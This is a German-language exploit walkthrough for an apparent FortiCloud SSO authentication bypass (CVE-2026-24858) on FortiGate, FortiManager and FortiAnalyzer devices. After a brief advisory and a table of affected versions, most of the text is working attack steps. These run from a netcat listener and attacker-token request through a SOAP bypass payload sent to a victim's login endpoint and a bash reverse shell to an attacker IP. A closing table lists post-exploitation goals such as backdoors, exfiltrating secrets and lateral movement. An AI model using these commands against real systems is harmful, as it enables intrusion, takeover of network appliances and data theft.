
CVE-2026-24858 FortiCloud Single Sign On (SSO) – eine standardmäßig aktivierte Funktion ab Werk, sobald Sie ein beliebiges FortiGate/FortiManager/FortiAnalyzer registrieren – enthält eine kritische Schwachstelle zur Umgehung der Authentifizierung.
FortiCloud Single-Sign-On (SSO), eine ab Werk standardmäßig aktivierte Funktion, sobald Sie ein FortiGate/FortiManager/FortiAnalyzer registrieren, enthält einen kritischen Authentifizierungs-Bypass-Fehler.
Ein Angreifer, der ein beliebiges FortiCloud-Konto besitzt (kostenlos oder kostenpflichtig), kann sein SSO-Token wiederverwenden, um sich ohne Kenntnis der Passwörter bei Appliances anderer Kunden (≤ unten aufgeführte Builds) anzumelden.
Nach der Ausnutzung erhält der Angreifer vollen Admin-GUI- und Root-Shell-Zugriff, was das Abfangen von Datenverkehr, das Manipulieren von VPNs oder die laterale Bewegung in interne Netzwerke ermöglicht.
Sofort aktualisieren oder FortiCloud SSO deaktivieren, bis ein Patch verfügbar ist.
| Produkt | Verwundbare Firmware | Gepatcht |
|---|
| FortiOS | 7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5 | ≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6 |
| FortiManager | 7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9 | gleiche major.minor+1 |
| FortiAnalyzer | gleiche Bereiche | gleich |
Angreifer-Maschine
Listener für Reverse Shell:
nc -lvnp 4444
Angreifer-Token abrufen (15 Min TTL)
curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
-H "Content-Type: application/json" \
-d '{"username":"[email protected]","password":"AttackerPass123"}'
Antwort (Auszug):
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
Kopieren Sie den Wert von access_token.
Bypass-Payload erstellen
Speichern Sie als bypass.xml:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<authRequest>
<serialNumber>FGT80ETK21000000</serialNumber>
<token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
<action>login</action>
</authRequest>
</soapenv:Body>
</soapenv:Envelope>
An das Opfer senden (jede Firmware ≤ obige Tabelle)
curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
-H "Content-Type: application/xml" \
--data @bypass.xml \
-c cookies.txt
HTTP 200 + Set-Cookie: APSCOOKIE=... → Erfolg.
Admin-GUI durchsuchen
Öffnen Sie einen Browser oder verwenden Sie curl mit dem gespeicherten Cookie:
curl -k -b cookies.txt https://<VICTIM-IP>/ng/
→ Dashboard erscheint, kein Passwort erforderlich.
Root-Shell (CLI-Widget)
In der GUI: Dashboard → CLI Console
execute bash
bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
Listener empfängt:
root@FGT80ETK21000000:/#
| Szenario | Ergebnis |
|---|---|
| Read-only-Admin | Vollständige Konfiguration exportieren (VPN-Geheimnisse, Local-in-Policies, Benutzer-Hashes). |
| Write-Admin | Firewall-Regeln ändern, lokale Benutzer erstellen, Protokollierung deaktivieren, persistente Skripte implantieren. |
| Root-Shell | config.dat auslesen, HA-Schlüssel extrahieren, zu internen Subnetzen wechseln, Backdoor-Dienst implantieren. |
| Laterale Bewegung | Gerät wird zum Ausgangspunkt; VLANs & SSL-VPN-Tunnel gelten als vertrauenswürdig → tieferer Netzwerk-Einbruch. |
| Datendiebstahl | Der gesamte Datenverkehr läuft durch das FortiGate → transparenter Proxy + Zertifikatsinjektion. |